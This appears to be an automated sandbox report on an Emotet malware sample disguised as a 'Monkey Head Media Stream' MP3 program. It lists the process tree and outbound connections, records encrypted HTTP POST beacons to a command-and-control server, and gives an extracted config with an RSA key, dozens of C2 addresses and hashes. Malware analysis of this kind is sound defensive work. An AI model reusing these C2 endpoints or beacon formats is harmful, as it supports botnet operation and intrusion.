Max &Filesize (Mb):
msctls_updown32
Spin1
&Max Minutes:
msctls_updown32
Spin1
&Stop Stream
&Get Stream
Status: Idle
Stream &Information (Read Only):
SysAnimate32
Animate1
MS Sans Serif
SysListView32
List3
&Edit
&Delete
&Get Stream
Bookmark count: 0
MS Sans Serif
&Single MP3 file.
&Numbered files.
&Keep window on top of all other windows.
Clear Stream URL &History
&Cancel
&Apply
Track Seperation Settings
Miscellaneous Options
&Metadata files
You can create a single MP3 file with all tracks merged or create seperate MP3 files for each audio track received. Both the "Numbered files" and "Metadata files" options create individual MP3 files if metadata is available.
The "Numbered files" option creates files namd with a specified prefix and numbered suffix (ex. YourTitle_0001.mp3, YourTitle_0002.mp3, etc). The "Metadata files" options uses available metadata (track, artist, song, etc) to name received audio tracks.
MS Sans Serif
Stream &Name
Stream &URL:
&Cancel
Static
VS_VERSION_INFO
StringFileInfo
040904b0
Comments
CompanyName
Monkey Head Software
FileDescription
Monkey Head Media Stream
FileVersion
1, 0, 0, 1
InternalName
LegalCopyright
2003
LegalTrademarks
OriginalFilename
MHMS.exe
PrivateBuild
ProductName
Monkey Head Media Stream
ProductVersion
1, 0, 0, 1
SpecialBuild
VarFileInfo
Translation
This file is not on VirusTotal.

Process Tree


ygg9ytft62s5ip.exe, PID: 1988, Parent PID: 2480
Full Path: C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe
Command Line: "C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe"
ygg9ytft62s5ip.exe, PID: 1356, Parent PID: 1988
Full Path: C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe
Command Line: --400e05c0
explorer.exe, PID: 1632, Parent PID: 1496
Full Path: C:\Windows\explorer.exe
Command Line: C:\Windows\Explorer.EXE
services.exe, PID: 460, Parent PID: 372
Full Path: C:\Windows\sysnative\services.exe
Command Line: C:\Windows\system32\services.exe
prepmspterm.exe, PID: 2344, Parent PID: 460
Full Path: C:\Windows\SysWOW64\prepmspterm.exe
Command Line: "C:\Windows\SysWOW64\prepmspterm.exe"
prepmspterm.exe, PID: 2732, Parent PID: 2344
Full Path: C:\Windows\SysWOW64\prepmspterm.exe
Command Line: --525413bf
svchost.exe, PID: 884, Parent PID: 460
Full Path: C:\Windows\sysnative\svchost.exe
Command Line: C:\Windows\System32\svchost.exe -k WerSvcGroup
WerFault.exe, PID: 2680, Parent PID: 884
Full Path: C:\Windows\sysnative\WerFault.exe
Command Line: C:\Windows\system32\WerFault.exe -u -p 1632 -s 2896

Hosts

Direct IP Country Name
Y 94.183.71.206 [VT] Iran, Islamic Republic of
Y 91.83.93.105 [VT] Hungary
Y 125.99.61.162 [VT] India

TCP

Source Source Port Destination Destination Port
192.168.35.21 49176 125.99.61.162 7080
192.168.35.21 49178 91.83.93.105 8080
192.168.35.21 49179 91.83.93.105 8080
192.168.35.21 49180 91.83.93.105 8080
192.168.35.21 49181 91.83.93.105 8080
192.168.35.21 49182 91.83.93.105 8080
192.168.35.21 49183 91.83.93.105 8080
192.168.35.21 49186 91.83.93.105 8080
192.168.35.21 49187 91.83.93.105 8080
192.168.35.21 49188 91.83.93.105 8080
192.168.35.21 49189 91.83.93.105 8080
192.168.35.21 49190 91.83.93.105 8080
192.168.35.21 49191 91.83.93.105 8080
192.168.35.21 49192 91.83.93.105 8080
192.168.35.21 49177 94.183.71.206 7080

UDP

No UDP connections recorded.

DNS

No domains contacted.

HTTP Requests

URI Data
http://91.83.93.105:8080/taskbar/
POST /taskbar/ HTTP/1.1
Referer: http://91.83.93.105/taskbar/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 445
Connection: Keep-Alive
Cache-Control: no-cache

7DBo=sphwcXxaf%2Bc9ykO4nd7nkJAMQhfUSAWSiilMN%2FSTPTS8BMN9bART4TSbqAAyRh%2FTBFbFQo2hvDOeTrYHWbK%2FJsbC1nvzEUtUSzCdFs1RjZEMGWtHytM9p%2BcGTrYrMgt43Y8dZVth6MfTeKkz7CUGI1eadIvs4Xhtn4%2Bg%2FbVVQrA3U9dOUk3VAzYz8XnxGTN9sjdqcHnC6sF67zBgDXJFkq67CwPSgKtpYV6Z4ytYrR9Hef7xQv1d7ZL5Oku91nggQKlYzSPjre1TsVyPGybNPiCblLIQNV6bSzMu62WK7kbZT1ivYovejx4d%2Bn53tehTraz4%2Bu7m%2Fdzp%2B%2Fvsn4jVcXmrkSsnZn4h1GWMflJOZW1uoiTSycG%2Btr6SzrrVq3ykJY0Emn9Z1gNcLLkTkBast2q1TXA%3D
http://91.83.93.105:8080/publish/
POST /publish/ HTTP/1.1
Referer: http://91.83.93.105/publish/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 451
Connection: Keep-Alive
Cache-Control: no-cache

Ewd8IZSd3gtI15D3=m6UhRBVyoVL60VPAsNzwwOT%2BL9WM0xl3bSfjnbPMiuGHoPU1oyqYzcQKOwjCbaKFugPxqBihyHTJv4UviZIr%2FGnKbGyh43f9aS5vwGW479okB9T6jPrMHzs2uXw2z53G3Y8dZVth6MfTeKkz7CUGI1eadIvs4Xhtn4%2Bg%2FbVVQrA3U9dOUk3VAzYz8XnxGTN9sjdqcHnC6sF67zBgDXJFkq67CwPSgKtpYV6Z4ytYrR9Hef7xQv1d7ZL5Oku91nggQKlYzSPjre1TsVyPGybNPiCblLIQNV6bSzMu62WK7kbZT1ivYovejx4d%2Bn53tehTraz4%2Bu7m%2Fdzp%2B%2Fvsn4jVcXmrkSsnZn4h1GWMflJOZW1uoiTSycG%2Btr6SzrrVq3ykJY0Emn9Z1gNcLLkTkBast2q1TXA%3D
http://91.83.93.105:8080/attrib/forced/
POST /attrib/forced/ HTTP/1.1
Referer: http://91.83.93.105/attrib/forced/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 440
Connection: Keep-Alive
Cache-Control: no-cache

haxKGtOdb=2hE96RVRL17CKCXMz5V7C9r73cLcpk8TcgtfhPVA32DKuwfLgDDZ34DYD6Dc1KY3ExbygSCijYRkNmPF%2FvrdQmjMELHiParXP77C7QnPYHZ40%2BRrHgMSzikRn%2BlWFBHO6ja%2B02kyb4NWfvijVbMJPemKOLTs4Xhtn4%2Bg%2FbVVQrA3U9dOUk3VAzYz8XnxGTN9sjdqcHnC6sF67zBgDXJFkq67CwPSgKtpYV6Z4ytYrR9Hef7xQv1d7ZL5Oku91nggQKlYzcUANOyy4JK1YETUhSKATtcaX3TlA8wnmiQ3fbFRYIXVA9jHbvgci61UHFQMFFTKfNVElCY6WLuzgP6XjE%2BNJKWcQSdPZJAuf6wpvWrKCDPjIacrW1kt6XpEOnz1Y4RREBcgkjAzgCWqOsEg%2BBn8ayw%3D
http://91.83.93.105:8080/prov/
POST /prov/ HTTP/1.1
Referer: http://91.83.93.105/prov/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 447
Connection: Keep-Alive
Cache-Control: no-cache

qmoiilWas5dm=Ralkj%2BetuW70gZVyMiFIhTv7gj2RUTTIKsrFABJVYK4oWIE9Xrv%2BTfHzGHD6k2NOojJ76yWxsAsVlwdjOE8OFCVT%2B6mxVscCVqMI7kqwG%2BZbHmLETjOiz0LhGACl%2B6lf6ja%2B02kyb4NWfvijVbMJPemKOLTs4Xhtn4%2Bg%2FbVVQrA3U9dOUk3VAzYz8XnxGTN9sjdqcHnC6sF67zBgDXJFkq67CwPSgKtpYV6Z4ytYrR9Hef7xQv1d7ZL5Oku91nggQKlYzcUANOyy4JK1YETUhSKATtcaX3TlA8wnmiQ3fbFRYIXVA9jHbvgci61UHFQMFFTKfNVElCY6WLuzgP6XjE%2BNJKWcQSdPZJAuf6wpvWrKCDPjIacrW1kt6XpEOnz1Y4RREBcgkjAzgCWqOsEg%2BBn8ayw%3D
http://91.83.93.105:8080/health/teapot/
POST /health/teapot/ HTTP/1.1
Referer: http://91.83.93.105/health/teapot/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 452
Connection: Keep-Alive
Cache-Control: no-cache

3p0PrGTKicOGZ9O6y=hjwFpyMcuRj%2BnCmmkdTB9RUwCkFD6mL%2FuSSZZgbUForiLXyZNNv%2Bsk44Vg%2F1yDwStIw1YOhCLi241VcpaD3j2mHp2gVzgKDb%2FYC0a37ERJklHGbeDEBkWChcEZe51CcK6ja%2B02kyb4NWfvijVbMJPemKOLTs4Xhtn4%2Bg%2FbVVQrA3U9dOUk3VAzYz8XnxGTN9sjdqcHnC6sF67zBgDXJFkq67CwPSgKtpYV6Z4ytYrR9Hef7xQv1d7ZL5Oku91nggQKlYzcUANOyy4JK1YETUhSKATtcaX3TlA8wnmiQ3fbFRYIXVA9jHbvgci61UHFQMFFTKfNVElCY6WLuzgP6XjE%2BNJKWcQSdPZJAuf6wpvWrKCDPjIacrW1kt6XpEOnz1Y4RREBcgkjAzgCWqOsEg%2BBn8ayw%3D
http://91.83.93.105:8080/sess/balloon/tpt/merge/
POST /sess/balloon/tpt/merge/ HTTP/1.1
Referer: http://91.83.93.105/sess/balloon/tpt/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 442
Connection: Keep-Alive
Cache-Control: no-cache

WM4GW2Z7mid=f86IvN8vq1gXjmsmmkS0xyI13nRfyc5zF3Pw6f4pSNAPvSmqbJbUPCQy6OUtbyPiJq%2BgZwfWBmZjJKH8gKHLmnkEXsr4Heo2iF%2FcdOFgRO432OAiBHn5D6%2FJj8tYL0C66ja%2B02kyb4NWfvijVbMJPemKOLTs4Xhtn4%2Bg%2FbVVQrA3U9dOUk3VAzYz8XnxGTN9sjdqcHnC6sF67zBgDXJFkq67CwPSgKtpYV6Z4ytYrR9Hef7xQv1d7ZL5Oku91nggQKlYzcUANOyy4JK1YETUhSKATtcaX3TlA8wnmiQ3fbFRYIXVA9jHbvgci61UHFQMFFTKfNVElCY6WLuzgP6XjE%2BNJKWcQSdPZJAuf6wpvWrKCDPjIacrW1kt6XpEOnz1Y4RREBcgkjAzgCWqOsEg%2BBn8ayw%3D
http://91.83.93.105:8080/merge/
POST /merge/ HTTP/1.1
Referer: http://91.83.93.105/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 477
Connection: Keep-Alive
Cache-Control: no-cache

79JqHChdjiBq83ce=Y0%2BktRySSyZhk%2FF99fWwuHD0BFkgYNAXo%2FyVrnFm1cPHKnwpJdshzFVABgPbozWl2eVagpPCXm834PrGeTSv4sLF%2FbC0XC9goj291mehrFvcUwtNZwutkP4sqP5CNFMhi4VXk96i9ZvrKnw7nKKisz9wjlqVXLsde3dwms3EPSfMtQilE10Ce8ZuMpV5k1Voqoi%2FwyQ55j3%2Fz49PmELK6G7v%2FTlpXICeG9%2FU0k9rWoA4tucZ5IDMRU6Niyrx6PCo5YP%2BGyoMfH1FImr66fLDmcWHcgmE6At3ICNYPZNZIugBJFCniMu7CECVTeDqWMva0iBpxCBNkgTSrJv01%2BCLyf8wmVdFXGCxZY6Il4eH3SwwhCyK%2FyiNe%2B9MFS9Or8h6AKO%2Fb0BCFeP8CocfesZrplaqUTM2Iiydc%2BKivVuksrr69UiA
http://91.83.93.105:8080/scripts/teapot/site/
POST /scripts/teapot/site/ HTTP/1.1
Referer: http://91.83.93.105/scripts/teapot/site/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 469
Connection: Keep-Alive
Cache-Control: no-cache

S0UEtVLMom=MVfusjd%2BG2lCfxbGYpmfhJvRk70j50zdjV7k07chDvYb%2F5Xg7LgUgNlezKQcggIX2EyiFwodTkFySaf0zankClr3uRvTm0HnIViN3YP2Dw32xBr2D66EHfFus%2FiPi2N1i4VXk96i9ZvrKnw7nKKisz9wjlqVXLsde3dwms3EPSfMtQilE10Ce8ZuMpV5k1Voqoi%2FwyQ55j3%2Fz49PmELK6G7v%2FTlpXICeG9%2FU0k9rWoA4tucZ5IDMRU6Niyrx6PCo5YP%2BGyoMfH1FImr66fLDmcWHcgmE6At3ICNYPZNZIugBJFCniMu7CECVTeDqWMva0iBpxCBNkgTSrJv01%2BCLyf8wmVdFXGCxZY6Il4eH3SwwhCyK%2FyiNe%2B9MFS9Or8h6AKO%2Fb0BCFeP8CocfesZrplaqUTM2Iiydc%2BKivVuksrr69UiA
http://91.83.93.105:8080/arizona/
POST /arizona/ HTTP/1.1
Referer: http://91.83.93.105/arizona/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 469
Connection: Keep-Alive
Cache-Control: no-cache

pw8IEGwt=iZJEaG2FShWGPuAbyLnX2RV%2B8YLKG0BANanz2hXBUSUcz0vaPOWpolM5BjqOnrlNkAHKoe7IqM7JZ3wUPet%2BSq4rZ9jGrTtVjZrud%2BtG3m%2FlcaqPhHThTSwDjSPqrLWMi4VXk96i9ZvrKnw7nKKisz9wjlqVXLsde3dwms3EPSfMtQilE10Ce8ZuMpV5k1Voqoi%2FwyQ55j3%2Fz49PmELK6G7v%2FTlpXICeG9%2FU0k9rWoA4tucZ5IDMRU6Niyrx6PCo5YP%2BGyoMfH1FImr66fLDmcWHcgmE6At3ICNYPZNZIugBJFCniMu7CECVTeDqWMva0iBpxCBNkgTSrJv01%2BCLyf8wmVdFXGCxZY6Il4eH3SwwhCyK%2FyiNe%2B9MFS9Or8h6AKO%2Fb0BCFeP8CocfesZrplaqUTM2Iiydc%2BKivVuksrr69UiA
http://91.83.93.105:8080/forced/prov/health/
POST /forced/prov/health/ HTTP/1.1
Referer: http://91.83.93.105/forced/prov/health/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 449
Connection: Keep-Alive
Cache-Control: no-cache

OCzdr9ZvyG=vOQD90Zt8yMPoMvzaiJ7XzzH7sUufzxX%2FWqYnhci8albiwSHOnvzpdKKA8ZhA42wewohEzvK17pcgoHRBgtdwQtxylxYQ8gzPWucTgUVWoHIH5oKGwj3XNx7yduoy2sFImltamtTwYP7uhyEANp1FZvpSvaxlFSWNntShVbB4S9DYArJTpnXPjgt5arQeYckZKl%2BzBilgL25jQq8FDvXk5QElm1o9KFqz0yW9%2FaCtDNuO%2FYeXqAHh2eIpS2MQFrRqY6rR0vzXr7ZCkbCbvjUQhtBU%2FIutJAmVCXe%2FjDUaT2SPJVA2fMdFzDuB%2FkGfRo5oPHeXyD1n72Qzq1qJ2qW8p46L%2B8D023D4pFF0h3y0PDsESXL%2Bya7p%2FS8pA6TjpGspjj09jzhNpdjjDhvVWdoiv%2FC0%2Bc%3D
http://91.83.93.105:8080/srvc/xian/
POST /srvc/xian/ HTTP/1.1
Referer: http://91.83.93.105/srvc/xian/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 460
Connection: Keep-Alive
Cache-Control: no-cache

lbJZyVfkaKTzL=DwGQmfyGrCTWiR71pbYIgc8JL2PWgX1omR1cMXH0WHxo%2FRvu%2BPaR4Z79%2FcOBX1JNgZEcqZcCu5ympUN1vWrSMn7ILeCpr%2FyUMwnQHaOcJLkafOor1bWc6fEvtVVKA4U%2BImltamtTwYP7uhyEANp1FZvpSvaxlFSWNntShVbB4S9DYArJTpnXPjgt5arQeYckZKl%2BzBilgL25jQq8FDvXk5QElm1o9KFqz0yW9%2FaCtDNuO%2FYeXqAHh2eIpS2MQFrRqY6rR0vzXr7ZCkbCbvjUQhtBU%2FIutJAmVCXe%2FjDUaT2SPJVA2fMdFzDuB%2FkGfRo5oPHeXyD1n72Qzq1qJ2qW8p46L%2B8D023D4pFF0h3y0PDsESXL%2Bya7p%2FS8pA6TjpGspjj09jzhNpdjjDhvVWdoiv%2FC0%2Bc%3D
http://91.83.93.105:8080/entries/
POST /entries/ HTTP/1.1
Referer: http://91.83.93.105/entries/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 445
Connection: Keep-Alive
Cache-Control: no-cache

OabE=bj1TDBwjuxn75iuU7hiJIVCk7jkZDV%2Bj8erLGYW0jiJGkZChQwSd5DofCXzd6kPd%2Fiz6jDpcg8Wg8XTru5D0WrH6YhiVgfdRGY9CaQSFiYXhDkDwTb8kHxS85CdjduuDImltamtTwYP7uhyEANp1FZvpSvaxlFSWNntShVbB4S9DYArJTpnXPjgt5arQeYckZKl%2BzBilgL25jQq8FDvXk5QElm1o9KFqz0yW9%2FaCtDNuO%2FYeXqAHh2eIpS2MQFrRqY6rR0vzXr7ZCkbCbvjUQhtBU%2FIutJAmVCXe%2FjDUaT2SPJVA2fMdFzDuB%2FkGfRo5oPHeXyD1n72Qzq1qJ2qW8p46L%2B8D023D4pFF0h3y0PDsESXL%2Bya7p%2FS8pA6TjpGspjj09jzhNpdjjDhvVWdoiv%2FC0%2Bc%3D
http://91.83.93.105:8080/chunk/between/odbc/
POST /chunk/between/odbc/ HTTP/1.1
Referer: http://91.83.93.105/chunk/between/odbc/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.83.93.105:8080
Content-Length: 461
Connection: Keep-Alive
Cache-Control: no-cache

AKAjVMmVTHHh1qqlOQ=UdL%2BTlxQwuJFFw6%2F%2BViWavRDLYulf4IFKCFVhK4cys6hcdxNTPeTMIapdpxRXl7404RTCJPS3SD7EWA9JeFNWq0zMSSBosVHp92LtPOzoVv6W4UcqnNVIgfoQEnWsyR0ImltamtTwYP7uhyEANp1FZvpSvaxlFSWNntShVbB4S9DYArJTpnXPjgt5arQeYckZKl%2BzBilgL25jQq8FDvXk5QElm1o9KFqz0yW9%2FaCtDNuO%2FYeXqAHh2eIpS2MQFrRqY6rR0vzXr7ZCkbCbvjUQhtBU%2FIutJAmVCXe%2FjDUaT2SPJVA2fMdFzDuB%2FkGfRo5oPHeXyD1n72Qzq1qJ2qW8p46L%2B8D023D4pFF0h3y0PDsESXL%2Bya7p%2FS8pA6TjpGspjj09jzhNpdjjDhvVWdoiv%2FC0%2Bc%3D

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

Source Destination ICMP Type Data
94.183.71.206 192.168.35.21 3
94.183.71.206 192.168.35.21 3
94.183.71.206 192.168.35.21 3

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name prepmspterm.exe
Associated Filenames
C:\Windows\SysWOW64\prepmspterm.exe
File Size 624643 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 0efd85b3915d9618f91979e65e520478
SHA1 e70ff18b0f850df07c81c168437f78d51c679625
SHA256 a1d4243b1e2380d5fc9d26ea036bd00c39f09cdcdfc1a3d2b699b5fc15cf29a0
CRC32 E6EF58FC
Ssdeep 6144:89b9SO5dVdRQ/vqkg1gEagdQHiQSzPgAJ76KkWv:8fBV7uikFgCShJkQ
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
Type Emotet Config
RSA public key
-----BEGIN PUBLIC KEY----- MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOzoTryw1r9RxRJPFKalO4+q7JaDZWSB KZlEc22H6ITuE06tvJspue42TF1yk8xN+1bqW++QeV6Clm1uRswA/qoao/6p4eN0 h4zIO8PEaJ0C/9EO4cx9yfRLlVpjdEkP0QIDAQAB -----END PUBLIC KEY-----
address
125.99.61.162:7080
94.183.71.206:7080
91.83.93.105:8080
216.98.148.181:8080
68.183.190.199:8080
170.84.133.72:7080
139.5.237.27:443
5.77.13.70:80
46.29.183.211:8080
46.41.151.103:8080
182.188.39.68:80
170.84.133.72:8443
186.83.133.253:8080
46.28.111.142:7080
62.75.160.178:8080
178.79.163.131:8080
190.104.253.234:990
149.62.173.247:8080
178.249.187.151:8080
81.169.140.14:443
5.196.35.138:7080
80.85.87.122:8080
187.188.166.192:80
186.0.95.172:80
151.80.142.33:80
201.199.93.30:443
68.183.170.114:8080
183.82.97.25:80
71.244.60.231:7080
91.205.215.57:7080
190.85.152.186:8080
189.166.68.89:443
217.199.160.224:8080
203.25.159.3:8080
190.158.19.141:80
82.196.15.205:8080
181.188.149.134:80
5.1.86.195:8080
190.10.194.42:8080
78.189.76.2:50000
200.58.171.51:80
51.15.8.192:8080
185.86.148.222:8080
123.168.4.66:22
200.57.102.71:8443
89.188.124.145:443
190.38.14.52:80
190.230.60.129:80
185.187.198.10:8080
142.93.82.57:8080
109.104.79.48:8080
189.160.49.234:8443
201.183.247.58:443
119.159.150.176:443
138.68.106.4:7080
159.203.204.126:8080
79.143.182.254:8080
71.244.60.230:7080
201.163.74.202:443
181.36.42.205:443
91.83.93.124:7080
87.106.77.40:7080
200.51.94.251:143
181.29.101.13:8080
212.71.237.140:8080
79.129.0.173:8080
190.221.50.210:8080
119.92.51.40:8080
88.250.223.190:8080
46.163.144.228:80
77.55.211.77:8080
190.1.37.125:443
62.75.143.100:7080
119.59.124.163:8080
46.101.212.195:8080
109.169.86.13:8080
76.69.29.42:80
77.245.101.134:8080
114.79.134.129:443
186.1.41.111:443
86.42.166.147:80
50.28.51.143:8080
81.213.215.216:50000
184.69.214.94:20
190.230.60.129:8080
Download
Type Emotet Payload
Size 67584 bytes
Process ygg9ytft62s5ip.exe
PID 1988
Path C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe
MD5 418af9878987cb3e32083b33b997d9dc
SHA1 4c2db48623445507cba1335447ff7bbd916a4d07
SHA256 ca367e63b58342f83f59aaa16830059e30800a8539fb4c8ece5d4ccbb10237aa
CRC32 931C1AEA
Ssdeep 1536:XpEHGXHswgKUokPaPfkM8Mf7hBGz0A4Ya6F+neV+:5zHsAUokS8u7h8IA4Yd0
Yara None matched
CAPE Yara
  • Emotet
  • Emotet Payload
Download Download ZIP
Type Emotet Payload
Size 75264 bytes
Process ygg9ytft62s5ip.exe
PID 1356
Path C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe
MD5 8667bf3fc2c166053d67d83b1d28fdf7
SHA1 9ff69774e71a250d6cc1eb61a46ee89fa0dbf7f3
SHA256 41f6357a855a8adfaabe45cbebfd568be9d4748563e0dae8cc2ce2148dd17f99
CRC32 F8672902
Ssdeep 1536:BpEHGXHswgKUokPaPfkM8Mf7hBGz0A4Ya6F+neVtg:PzHsAUokS8u7h8IA4YdHg
Yara None matched
CAPE Yara
  • Emotet
  • Emotet Payload
Download Download ZIP
Process Name ygg9ytft62s5ip.exe
PID 1988
Dump Size 42496 bytes
Module Path C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe
Type PE image: 32-bit executable
MD5 381da858b27fe5bf320f8d12b30414e4
SHA1 d043a46344f1a51007476bbd8585a4f4ee9d7646
SHA256 0de8ce40afd78690231ecf795f6feacdc3e8bbf621266f8254a4490acf298805
CRC32 EB3F65F1
Ssdeep 768:hU4ykhbQ0Voa9Qz4mh6yfQmMrtF1w93LNso/k9Z2jrMUUzPKnqvOXV:hbykplQz4QnSv1w93eo/8g8zGmOXV
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 0de8ce40afd78690231ecf795f6feacdc3e8bbf621266f8254a4490acf298805
Download
Process Name prepmspterm.exe
PID 2344
Dump Size 42496 bytes
Module Path C:\Windows\SysWOW64\prepmspterm.exe
Type PE image: 32-bit executable
MD5 cc41aa765857f699268bd7b12ca9be06
SHA1 c67d7a1e5291c625a787d2fdfbf49ca507f92170
SHA256 7bcbc252aa1a3e461adbadffe0ea1d7d3bed7b1abdbc5cc26d600e84a7783f73
CRC32 47DD1AC7
Ssdeep 768:hU4ykhbQ0Voa9Qz4mh6yfQmMrtF1w93LNso/k9Z2jrMUUzPKnqvOJ:hbykplQz4QnSv1w93eo/8g8zGmOJ
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 7bcbc252aa1a3e461adbadffe0ea1d7d3bed7b1abdbc5cc26d600e84a7783f73
Download
Process Name ygg9ytft62s5ip.exe
PID 1356
Dump Size 42496 bytes
Module Path C:\Users\user\AppData\Local\Temp\ygg9ytft62s5ip.exe
Type PE image: 32-bit executable
MD5 b306d5080bc507cbea1bd969734d6685
SHA1 b4e0e9df4571bfb4baf9165ac1b408d6b26060d1
SHA256 26890b6fefb4f23dfd123873adc17c0251a50de7ca30a3e80df90d1c5c62e51b
CRC32 A201655B
Ssdeep 768:hU4ykhbQ0Voa9Qz4mh6yfQmMrtF1w93LNso/k9Z2jrMUUzPKnqvO9:hbykplQz4QnSv1w93eo/8g8zGmO9
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 26890b6fefb4f23dfd123873adc17c0251a50de7ca30a3e80df90d1c5c62e51b
Download
Process Name prepmspterm.exe
PID 2732
Dump Size 42496 bytes
Module Path C:\Windows\SysWOW64\prepmspterm.exe
Type PE image: 32-bit executable
MD5 0cbf37c565f8cbfcc17e6f4464953113
SHA1 4e528bfa2353b9758684ad09ba8c1384a6e64fa5
SHA256 bc2503cb313e08dca0028780869b76356e1bf09139f4f8f3678785b85020f90e
CRC32 3481039B
Ssdeep 768:hU4ykhbQ0Voa9Qz4mh6yfQmMrtF1w93LNso/k9Z2jrMUUzPKnqvOl:hbykplQz4QnSv1w93eo/8g8zGmOl
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename bc2503cb313e08dca0028780869b76356e1bf09139f4f8f3678785b85020f90e
Download
Process Name svchost.exe
PID 884
Dump Size 26112 bytes
Module Path C:\Windows\sysnative\svchost.exe
Type PE image: 64-bit executable
MD5 bcc3e3e1a277f2daad03e57a5e9304b2
SHA1 59734694a9aab0e2b85b7746379e82d9ed26920e
SHA256 ecf52578f007d1ec7a943b1049983e6b32235204e3753ff4a2a087239c9b4fc9
CRC32 40BCE0D7
Ssdeep 384:OZvvWkXZVq+1t5TYGaVeAYMq1n+Rfk4ue//wCE/lWPWSsEsj45RCOvoji3PKW9CU:uWkX7q+f5TYvVeZMmn+0C4x/EbvKoPK
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename ecf52578f007d1ec7a943b1049983e6b32235204e3753ff4a2a087239c9b4fc9
Download
Process Name WerFault.exe
PID 2680
Dump Size 415232 bytes
